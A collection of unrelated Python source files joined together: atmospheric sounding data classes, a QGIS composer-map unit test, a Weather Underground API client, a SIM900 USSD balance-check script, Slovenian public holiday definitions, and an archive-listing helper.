class _SoundingTimeLayer(object):
"""
The second-level sounding object returned when calling SoundingsSupport.getSounding.
This object acts as a 2-tiered dict which is keyed by level then parameter
name. Calling levels() will return all valid keys into this
object. Calling time() will return the DataTime for this particular layer.
"""
def __init__(self, dataTime):
self._dataTime = dataTime
self._dataDict = {}
def _addItem(self, parameter, level, value):
asString = str(level)
levelLayer = self._dataDict.get(asString, _SoundingTimeAndLevelLayer(self._dataTime, asString))
levelLayer._addItem(parameter, value)
self._dataDict[asString] = levelLayer
def __getitem__(self, key):
asString = str(key)
if asString in self._dataDict:
return self._dataDict[asString]
else:
raise KeyError("Level " + str(key) + " is not a valid level for this sounding.")
def __len__(self):
return len(self._dataDict)
def time(self):
"""
Returns the DataTime for this sounding cube layer.
Returns:
The DataTime for this sounding layer.
"""
return self._dataTime
def levels(self):
"""
Returns the valid levels for this sounding.
Returns:
A list containing the valid levels for this sounding in order of
closest to surface to highest from surface.
"""
sortedLevels = [Level(level) for level in list(self._dataDict.keys())]
sortedLevels.sort()
return [str(level) for level in sortedLevels]
class _SoundingTimeAndLevelLayer(object):
"""
The bottom-level sounding object returned when calling SoundingsSupport.getSounding.
This object acts as a dict which is keyed by parameter name. Calling
parameters() will return all valid keys into this object. Calling time()
will return the DataTime for this particular layer. Calling level() will
return the level for this layer.
"""
def __init__(self, time, level):
self._time = time
self._level = level
self._parameters = {}
def _addItem(self, parameter, value):
self._parameters[parameter] = value
def __getitem__(self, key):
return self._parameters[key]
def __len__(self):
return len(self._parameters)
def level(self):
"""
Returns the level for this sounding cube layer.
Returns:
The level for this sounding layer.
"""
return self._level
def parameters(self):
"""
Returns the valid parameters for this sounding.
Returns:
A list containing the valid parameter names.
"""
return list(self._parameters.keys())
def time(self):
"""
Returns the DataTime for this sounding cube layer.
Returns:
The DataTime for this sounding layer.
"""
return self._time
|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsComposerMap.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '(C) 2012 by Dr. Horst Düster / Dr. Marco Hugentobler'
__date__ = '20/08/2012'
__copyright__ = 'Copyright 2012, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis
import os
from PyQt4.QtCore import QFileInfo
from PyQt4.QtXml import QDomDocument
from PyQt4.QtGui import QPainter
from qgis.core import (QgsComposerMap,
QgsRectangle,
QgsRasterLayer,
QgsComposition,
QgsMapRenderer,
QgsMapLayerRegistry,
QgsMultiBandColorRenderer,
)
from utilities import (unitTestDataPath,
getQgisTestApp,
TestCase,
unittest,
expectedFailure
)
from qgscompositionchecker import QgsCompositionChecker
QGISAPP, CANVAS, IFACE, PARENT = getQgisTestApp()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsComposerMap(TestCase):
def __init__(self, methodName):
"""Run once on class initialisation."""
unittest.TestCase.__init__(self, methodName)
myPath = os.path.join(TEST_DATA_DIR, 'rgb256x256.png')
rasterFileInfo = QFileInfo(myPath)
mRasterLayer = QgsRasterLayer(rasterFileInfo.filePath(),
rasterFileInfo.completeBaseName())
rasterRenderer = QgsMultiBandColorRenderer(
mRasterLayer.dataProvider(), 1, 2, 3)
mRasterLayer.setRenderer(rasterRenderer)
#pipe = mRasterLayer.pipe()
#assert pipe.set(rasterRenderer), 'Cannot set pipe renderer'
QgsMapLayerRegistry.instance().addMapLayers([mRasterLayer])
# create composition with composer map
self.mMapRenderer = QgsMapRenderer()
layerStringList = []
layerStringList.append(mRasterLayer.id())
self.mMapRenderer.setLayerSet(layerStringList)
self.mMapRenderer.setProjectionsEnabled(False)
self.mComposition = QgsComposition(self.mMapRenderer)
self.mComposition.setPaperSize(297, 210)
self.mComposerMap = QgsComposerMap(self.mComposition, 20, 20, 200, 100)
self.mComposerMap.setFrameEnabled(True)
self.mComposition.addComposerMap(self.mComposerMap)
def testOverviewMap(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(96, -152, 160, -120)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
checker = QgsCompositionChecker('composermap_overview', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
def testOverviewMapBlend(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(96, -152, 160, -120)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
overviewMap.setOverviewBlendMode(QPainter.CompositionMode_Multiply)
checker = QgsCompositionChecker('composermap_overview_blending', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
def testOverviewMapInvert(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(96, -152, 160, -120)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
overviewMap.setOverviewInverted(True)
checker = QgsCompositionChecker('composermap_overview_invert', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
def testOverviewMapCenter(self):
overviewMap = QgsComposerMap(self.mComposition, 20, 130, 70, 70)
overviewMap.setFrameEnabled(True)
self.mComposition.addComposerMap(overviewMap)
# zoom in
myRectangle = QgsRectangle(192, -288, 320, -224)
self.mComposerMap.setNewExtent(myRectangle)
myRectangle2 = QgsRectangle(0, -256, 256, 0)
overviewMap.setNewExtent(myRectangle2)
overviewMap.setOverviewFrameMap(self.mComposerMap.id())
overviewMap.setOverviewInverted(False)
overviewMap.setOverviewCentered(True)
checker = QgsCompositionChecker('composermap_overview_center', self.mComposition)
checker.setControlPathPrefix("composer_mapoverview")
myTestResult, myMessage = checker.testComposition()
self.mComposition.removeComposerItem(overviewMap)
assert myTestResult, myMessage
# Fails because addItemsFromXML has been commented out in sip
@expectedFailure
def testuniqueId(self):
doc = QDomDocument()
documentElement = doc.createElement('ComposerItemClipboard')
self.mComposition.writeXML(documentElement, doc)
self.mComposition.addItemsFromXML(documentElement, doc, 0, False)
# test if both composer maps have different ids
newMap = QgsComposerMap()
mapList = self.mComposition.composerMapItems()
for mapIt in mapList:
if mapIt != self.mComposerMap:
newMap = mapIt
break
oldId = self.mComposerMap.id()
newId = newMap.id()
self.mComposition.removeComposerItem(newMap)
myMessage = 'old: %s new: %s' % (oldId, newId)
assert oldId != newId, myMessage
def testWorldFileGeneration(self):
myRectangle = QgsRectangle(781662.375, 3339523.125, 793062.375, 3345223.125)
self.mComposerMap.setNewExtent(myRectangle)
self.mComposerMap.setMapRotation(30.0)
self.mComposition.setGenerateWorldFile(True)
self.mComposition.setWorldFileMap(self.mComposerMap)
p = self.mComposition.computeWorldFileParameters()
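        # Note added for clarity (not in the original test): the six values are
        # presumably the affine world-file coefficients (a, b, c, d, e, f) of the
        # page-to-map transform x' = a*x + b*y + c, y' = d*x + e*y + f; the skew
        # terms are non-zero here because of the 30 degree rotation set above.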
pexpected = (4.180480199790922, 2.4133064516129026, 779443.7612381146,
2.4136013686911886, -4.179969388427311, 3342408.5663611)
ptolerance = (0.001, 0.001, 1, 0.001, 0.001, 1e+03)
for i in range(0, 6):
assert abs(p[i] - pexpected[i]) < ptolerance[i]
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
import datetime
import requests
FORECAST_URL = 'http://www.wunderground.com/cgi-bin/findweather/' \
'getForecast'
API_TEMPLATE = 'http://api.wunderground.com/api/{}'
api = None
class WeatherException(Exception):
def __init__(self, message, error=None):
super(WeatherException, self).__init__(message)
self.error = error
def set_key(key):
global api
api = API_TEMPLATE.format(key)
def get_forecast_url(location, date=None):
url = '{}?query={}'.format(FORECAST_URL, location)
if date:
if isinstance(date, (str, unicode)):
date = datetime.datetime.strptime(date, '%Y-%m-%d').date()
url += '&hourly=1&yday={}&weekday={}'.format(
date.strftime('%j'), date.strftime('%A'))
return url
def forecast(location):
'''
    Get the current conditions and a 10-day forecast for a location.
    The location may be 'latitude,longitude' (e.g. -39.452,18.234), a US ZIP
    code, or a 'state/city' path like 'OH/Fairborn' or 'NY/New_York'.
'''
url = '{}/conditions/alerts/astronomy/forecast10day/q/{}.json'.format(
api, location)
r = requests.get(url).json()
if 'error' in r['response']:
raise WeatherException('Your key is invalid or wunderground is down',
r['response']['error'])
return r
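# Hedged usage note (not part of the original script): after set_key('<api key>'),
# forecast('OH/Fairborn') returns the raw Weather Underground JSON. Typical
# top-level keys included 'current_observation' and 'forecast', but the exact
# structure belonged to the now-retired API and is stated here as an assumption.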
def autocomplete(query):
'''Return autocomplete values for a query'''
url = 'http://autocomplete.wunderground.com/aq?query={}'.format(query)
return requests.get(url).json()['RESULTS']
if __name__ == '__main__':
from argparse import ArgumentParser
from pprint import pformat
parser = ArgumentParser()
parser.add_argument('function', choices=('forecast', 'autocomplete'))
    parser.add_argument('location', help="ZIP code, 'lat,lon' pair, or 'state/city' path")
parser.add_argument('-k', '--key', help='API key')
args = parser.parse_args()
if args.key:
set_key(args.key)
func = globals()[args.function]
print pformat(func(args.location))
|
#!/usr/bin/python3
from test_shared import *
from lib.sim900.ussdhandler import SimUssdHandler
import re
from lib.sim900.simshared import *
COMPORT_NAME = "com22"
#logging levels
CONSOLE_LOGGER_LEVEL = logging.INFO
LOGGER_LEVEL = logging.INFO
def parseBalanceResult(value, prefix, suffix, mustBeFloat = True):
"""
    Parses a string that contains information about the current account balance.
    The balance value is expected to appear between the given prefix and suffix.
    :param value: text to scan
    :param prefix: text that precedes the balance value
    :param suffix: text that follows the balance value
    :param mustBeFloat: whether the balance must be parsed as a float
    :return: current balance value, or None on error
"""
    # escape prefix/suffix so regex metacharacters in them are matched literally
    m = re.search("{0}(.+?){1}".format(re.escape(prefix), re.escape(suffix)), value)
if not m:
return None
found = m.group(1)
if found is None:
found = ''
else:
found = str(found).strip()
if mustBeFloat:
return strToFloat(found)
if not str(found).isnumeric():
return None
return int(found)
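# Illustrative example of the parsing contract (the sample USSD text below is
# made up, not a real operator response):
#   parseBalanceResult("Balans 15.75 grn, diyi do 01.01", "Balans ", "grn,")
# would return 15.75 with mustBeFloat=True; if the text between prefix and
# suffix is not numeric, None is returned instead.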
def main():
"""
    Tests USSD command execution and result retrieval.
    :return: True if everything was OK, otherwise False
"""
#adding & initializing port object
port = initializeUartPort(portName=COMPORT_NAME)
#initializing logger
(formatter, logger, consoleLogger,) = initializeLogs(LOGGER_LEVEL, CONSOLE_LOGGER_LEVEL)
#making base operations
d = baseOperations(port, logger)
if d is None:
return False
(gsm, imei) = d
ussd = SimUssdHandler(port, logger)
logger.info("running USSD code")
    #run the USSD command that returns balance information (for the 'life :)' cell operator in Ukraine)
if not ussd.runUssdCode("*111#"):
logger.error("error running USSD code")
return False
logger.info("USSD result = {0}".format(ussd.lastUssdResult))
logger.info("Reading current balance value...")
#Parsing balance for 'life :)' cell operator from Ukraine
balance = parseBalanceResult(ussd.lastUssdResult, "Balans ", "grn,")
if balance is not None:
logger.info("Current balance value: {0}".format(balance))
else:
        logger.warning("balance retrieval error")
gsm.closePort()
return True
if __name__ == "__main__":
main()
print("DONE")
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <[email protected]> (c) 2014-2017
# dr-prodigy <[email protected]> (c) 2017-2020
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd
from holidays.constants import JAN, FEB, APR, MAY, JUN, AUG, OCT, \
NOV, DEC
from holidays.holiday_base import HolidayBase
class Slovenia(HolidayBase):
"""
    Contains all work-free public holidays in Slovenia.
    No holidays are returned before 1991, when Slovenia became an independent
    country. Before that, Slovenia was part of the Socialist Federal Republic
    of Yugoslavia.
    List of holidays (including those that are not work-free):
    https://en.wikipedia.org/wiki/Public_holidays_in_Slovenia
"""
def __init__(self, **kwargs):
self.country = 'SI'
HolidayBase.__init__(self, **kwargs)
def _populate(self, year):
if year <= 1990:
return
if year > 1991:
self[date(year, JAN, 1)] = "novo leto"
        # From 2013 to 2016 (inclusive), 2 January was not a public holiday,
        # or at least not a work-free day
if year < 2013 or year > 2016:
self[date(year, JAN, 2)] = "novo leto"
# Prešeren's day, slovenian cultural holiday
self[date(year, FEB, 8)] = "Prešernov dan"
# Easter monday is the only easter related work-free day
easter_day = easter(year)
self[easter_day + rd(days=1)] = "Velikonočni ponedeljek"
# Day of uprising against occupation
self[date(year, APR, 27)] = "dan upora proti okupatorju"
# Labour day, two days of it!
self[date(year, MAY, 1)] = "praznik dela"
self[date(year, MAY, 2)] = "praznik dela"
# Statehood day
self[date(year, JUN, 25)] = "dan državnosti"
# Assumption day
self[date(year, AUG, 15)] = "Marijino vnebovzetje"
# Reformation day
self[date(year, OCT, 31)] = "dan reformacije"
# Remembrance day
self[date(year, NOV, 1)] = "dan spomina na mrtve"
# Christmas
self[date(year, DEC, 25)] = "Božič"
# Day of independence and unity
self[date(year, DEC, 26)] = "dan samostojnosti in enotnosti"
class SI(Slovenia):
pass
class SVN(Slovenia):
pass
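# Hedged usage sketch (not part of the original module): HolidayBase exposes a
# dict-like interface, so membership tests and lookups work as shown below once
# the surrounding python-holidays package is importable.
if __name__ == '__main__':
    si_holidays = Slovenia(years=[2020])
    print(date(2020, FEB, 8) in si_holidays)      # True - Prešernov dan
    print(si_holidays.get(date(2020, DEC, 25)))   # Božič
    print(date(2020, JAN, 3) in si_holidays)      # False - an ordinary workday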
|
import mimetypes
import zipfile
import gzip
import tarfile
from cStringIO import StringIO
class _ZipMember(object):
def __init__(self, member, container):
self.name = member.filename
self.size = member.file_size
self.container = container
def extractor(self):
return self.container.open(self.name)
class _TarMember(object):
def __init__(self, member, container):
self.member = member
self.name = member.name
self.size = member.size
self.container = container
def extractor(self):
return self.container.extractfile(self.member)
def get_archive_members(file_object, content_type):
if content_type == 'application/zip':
zf = zipfile.ZipFile(file_object)
for member in zf.infolist():
yield _ZipMember(
member,
zf
)
elif content_type == 'application/x-gzip':
tar = gzip.GzipFile(fileobj=file_object)
zf = tarfile.TarFile(fileobj=tar)
for member in zf.getmembers():
if member.isfile():
yield _TarMember(
member,
zf
)
elif content_type == 'application/x-tar':
zf = tarfile.TarFile(fileobj=file_object)
for member in zf.getmembers():
            # Sometimes when you make a tar file (notably on macOS) you get
            # smaller metadata copies whose names start with "./._"; skip those.
if member.isfile() and not member.name.startswith('./._'):
yield _TarMember(
member,
zf
)
else:
raise NotImplementedError(content_type)
def preview_archive_content(file_object, content_type):
"""return file listing of the contents of an archive file"""
out = StringIO()
for member in get_archive_members(file_object, content_type):
print >>out, member.name.ljust(70),
print >>out, str(member.size).rjust(9)
return out.getvalue()
def filename_to_mimetype(filename):
filename = filename.lower()
    # mimetypes.guess_type() reports .tgz and .tar.gz files as
    # 'application/x-tar', so map them to 'application/x-gzip' explicitly
if filename.endswith('.tgz') or filename.endswith('.tar.gz'):
return 'application/x-gzip'
return mimetypes.guess_type(filename)[0]
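# Hedged usage sketch (not part of the original module): 'backup.tar.gz' is an
# assumed example path; any .zip, .tgz/.tar.gz or .tar archive works the same way.
if __name__ == '__main__':
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else 'backup.tar.gz'
    with open(path, 'rb') as f:
        print preview_archive_content(f, filename_to_mimetype(path))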
|